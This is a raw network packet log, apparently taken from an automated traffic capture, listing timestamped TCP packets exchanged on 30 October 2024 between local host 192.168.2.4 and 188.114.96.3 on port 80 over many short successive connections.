                                                        Oct 30, 2024 05:22:19.716116905 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.721447945 CET8049749188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.721510887 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.721645117 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.727029085 CET8049749188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.766573906 CET8049748188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.841146946 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.846610069 CET8049751188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.846664906 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.846756935 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.852322102 CET8049751188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.912870884 CET8049748188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.912924051 CET4974880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.073736906 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.079257011 CET8049749188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.079272985 CET8049749188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.198719978 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.204076052 CET8049751188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.354216099 CET8049749188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.401722908 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.442985058 CET8049751188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.495479107 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.569827080 CET8049749188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.620477915 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.755902052 CET8049751188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.807998896 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.883693933 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.883979082 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.884591103 CET4975280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.889281988 CET8049749188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.889333963 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.889616966 CET8049751188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.889659882 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.889974117 CET8049752188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.890038967 CET4975280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.890213966 CET4975280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.895469904 CET8049752188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:21.245680094 CET4975280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:21.251744032 CET8049752188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:21.495198965 CET8049752188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:21.542354107 CET4975280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:21.807921886 CET8049752188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:21.854887009 CET4975280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:21.932518005 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:21.937942982 CET8049753188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:21.938033104 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:21.938133001 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:21.943453074 CET8049753188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:22.292851925 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.298454046 CET8049753188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:22.675173998 CET8049753188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:22.729954004 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.845477104 CET8049753188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:22.886147022 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.961935997 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.962721109 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.967749119 CET8049753188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:22.967830896 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.968111992 CET8049754188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:22.968180895 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.968296051 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.973628998 CET8049754188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:23.324178934 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:23.329818010 CET8049754188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:23.564693928 CET8049754188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:23.620572090 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:23.777857065 CET8049754188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:23.823683977 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:24.208312988 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:24.208743095 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:24.214102983 CET8049755188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:24.214179039 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:24.214325905 CET8049754188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:24.214390039 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:24.214508057 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:24.219872952 CET8049755188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:24.574038029 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:24.579694986 CET8049755188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:24.813105106 CET8049755188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:24.854939938 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.128501892 CET8049755188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.183099985 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.244019032 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.244939089 CET4975680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.249938965 CET8049755188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.250015974 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.250356913 CET8049756188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.250432968 CET4975680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.250540018 CET4975680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.255855083 CET8049756188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.575530052 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.575587988 CET4975680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.580997944 CET8049757188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.581135988 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.581412077 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.586746931 CET8049757188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.622595072 CET8049756188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.696671009 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.702147007 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.702286959 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.702455997 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.707760096 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.738974094 CET8049756188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.739213943 CET4975680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.933413029 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.938937902 CET8049757188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.939055920 CET8049757188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.058123112 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.063555002 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.169406891 CET8049757188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.214307070 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.303546906 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.354939938 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.476856947 CET8049757188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.526782036 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.609280109 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.609304905 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.609404087 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.776631117 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.776848078 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.777510881 CET4975980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.936162949 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.936297894 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.937203884 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.937257051 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.937429905 CET8049759188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.937541962 CET4975980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.937788010 CET4975980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.939393997 CET8049757188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.939410925 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.939455986 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.939481974 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.943033934 CET8049759188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:27.292737961 CET4975980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:27.298573017 CET8049759188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:27.544359922 CET8049759188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:27.589265108 CET4975980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:27.750662088 CET8049759188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:27.792442083 CET4975980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:27.869409084 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:27.874866009 CET8049760188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:27.874941111 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:27.875128031 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:27.880402088 CET8049760188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.230424881 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.236136913 CET8049760188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.484014034 CET8049760188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.526757002 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.688694954 CET8049760188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.688726902 CET8049760188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.688813925 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.806385040 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.806875944 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.812242031 CET8049760188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.812324047 CET8049761188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.812335968 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.812390089 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.812566996 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.817843914 CET8049761188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.823750973 CET4975980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:29.197020054 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:29.202513933 CET8049761188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:29.411355972 CET8049761188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:29.464293003 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:29.936551094 CET8049761188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:29.942617893 CET8049761188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:29.943881035 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.057480097 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.058353901 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.063433886 CET8049761188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:30.063508034 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.063646078 CET8049762188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:30.063718081 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.063885927 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.069195032 CET8049762188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:30.417610884 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.423160076 CET8049762188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:30.669910908 CET8049762188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:30.714348078 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.981450081 CET8049762188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.026794910 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.106797934 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.107724905 CET4976380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.112889051 CET8049762188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.113002062 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.113104105 CET8049763188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.113172054 CET4976380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.113405943 CET4976380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.118665934 CET8049763188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.464392900 CET4976380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.469984055 CET8049763188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.497697115 CET4976480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.498053074 CET4976380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.503294945 CET8049764188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.503417969 CET4976480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.508161068 CET4976480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.513537884 CET8049764188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.550635099 CET8049763188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.588196993 CET8049763188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.588284969 CET4976380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.634295940 CET4976580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.639750004 CET8049765188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.639864922 CET4976580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.640053988 CET4976580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.645390034 CET8049765188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.855062008 CET4976480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.860584021 CET8049764188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.860938072 CET8049764188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.995739937 CET4976580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:32.001157999 CET8049765188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:32.107992887 CET8049764188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:32.151829958 CET4976480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:32.417898893 CET8049765188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:32.443999052 CET8049764188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:32.454818964 CET8049765188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:32.454896927 CET4976580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:32.495601892 CET4976480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:32.542638063 CET8049765188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:32.589286089 CET4976580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:32.661726952 CET4976480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:32.661746979 CET4976580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:32.662785053 CET4976680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:32.668118954 CET8049764188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:32.668200970 CET4976480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:32.668448925 CET8049765188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:32.668498993 CET4976580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:32.669137955 CET8049766188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:32.669208050 CET4976680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:32.669368029 CET4976680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:32.674647093 CET8049766188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:33.026966095 CET4976680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:33.033741951 CET8049766188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:33.268182993 CET8049766188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:33.323687077 CET4976680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:33.465444088 CET8049766188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:33.511187077 CET4976680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:33.589540005 CET4976780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:33.595019102 CET8049767188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:33.595112085 CET4976780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:33.595273972 CET4976780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:33.600647926 CET8049767188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:33.949769974 CET4976780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:33.955224991 CET8049767188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:34.197993994 CET8049767188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:34.245589018 CET4976780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:34.422835112 CET8049767188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:34.464318991 CET4976780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:34.540143013 CET4976780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:34.541209936 CET4976880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:34.546262980 CET8049767188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:34.546349049 CET4976780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:34.546705961 CET8049768188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:34.546786070 CET4976880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:34.546958923 CET4976880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:34.552333117 CET8049768188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:34.937462091 CET4976880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:34.942955017 CET8049768188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:35.156927109 CET8049768188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:35.198717117 CET4976880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:35.461256981 CET8049768188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:35.461453915 CET8049768188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:35.461617947 CET4976880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:35.616457939 CET4976680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:35.650043964 CET4976880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:35.650715113 CET4976980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:35.655920982 CET8049768188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:35.655991077 CET4976880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:35.656065941 CET8049769188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:35.656141996 CET4976980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:35.656249046 CET4976980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:35.661642075 CET8049769188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:36.011576891 CET4976980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:36.017206907 CET8049769188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:36.272736073 CET8049769188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:36.323744059 CET4976980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:36.572256088 CET8049769188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:36.620620966 CET4976980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:36.695931911 CET4976980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:36.697117090 CET4977080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:36.701811075 CET8049769188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:36.701904058 CET4976980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:36.702523947 CET8049770188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:36.702608109 CET4977080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:36.702848911 CET4977080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:36.708349943 CET8049770188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:37.058192015 CET4977080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:37.063604116 CET8049770188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:37.323285103 CET8049770188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:37.370575905 CET4977080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:37.449604988 CET4977080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:37.450170040 CET4977180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:37.456273079 CET8049771188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:37.456361055 CET4977180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:37.456433058 CET8049770188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:37.456464052 CET4977180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:37.456506968 CET4977080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:37.463208914 CET8049771188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:37.569560051 CET4977280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:37.574903965 CET8049772188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:37.574982882 CET4977280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:37.575124979 CET4977280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:37.580365896 CET8049772188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:37.808242083 CET4977180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:37.813707113 CET8049771188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:37.813826084 CET8049771188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:37.933491945 CET4977280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:38.131815910 CET8049771188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:38.132741928 CET8049772188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:38.180978060 CET8049772188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:38.185089111 CET4977180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:38.229984999 CET4977280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:38.359138966 CET8049771188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:38.402054071 CET4977180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:38.557060957 CET8049772188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:38.604959965 CET4977280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:38.677557945 CET4977280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:38.677561998 CET4977180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:38.678678989 CET4977380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:38.684022903 CET8049773188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:38.684103966 CET4977380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:38.684258938 CET4977380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:38.689291954 CET8049772188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:38.689304113 CET8049771188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:38.689363003 CET4977280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:38.689383030 CET4977180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:38.689507961 CET8049773188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:39.043608904 CET4977380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:39.049308062 CET8049773188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:39.278875113 CET8049773188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:39.323761940 CET4977380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:39.582886934 CET8049773188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:39.636401892 CET4977380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:39.710304022 CET4977480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:39.715851068 CET8049774188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:39.715986013 CET4977480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:39.716118097 CET4977480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:39.721467972 CET8049774188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:40.074007034 CET4977480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:40.079559088 CET8049774188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:40.314851999 CET8049774188.114.96.3192.168.2.4
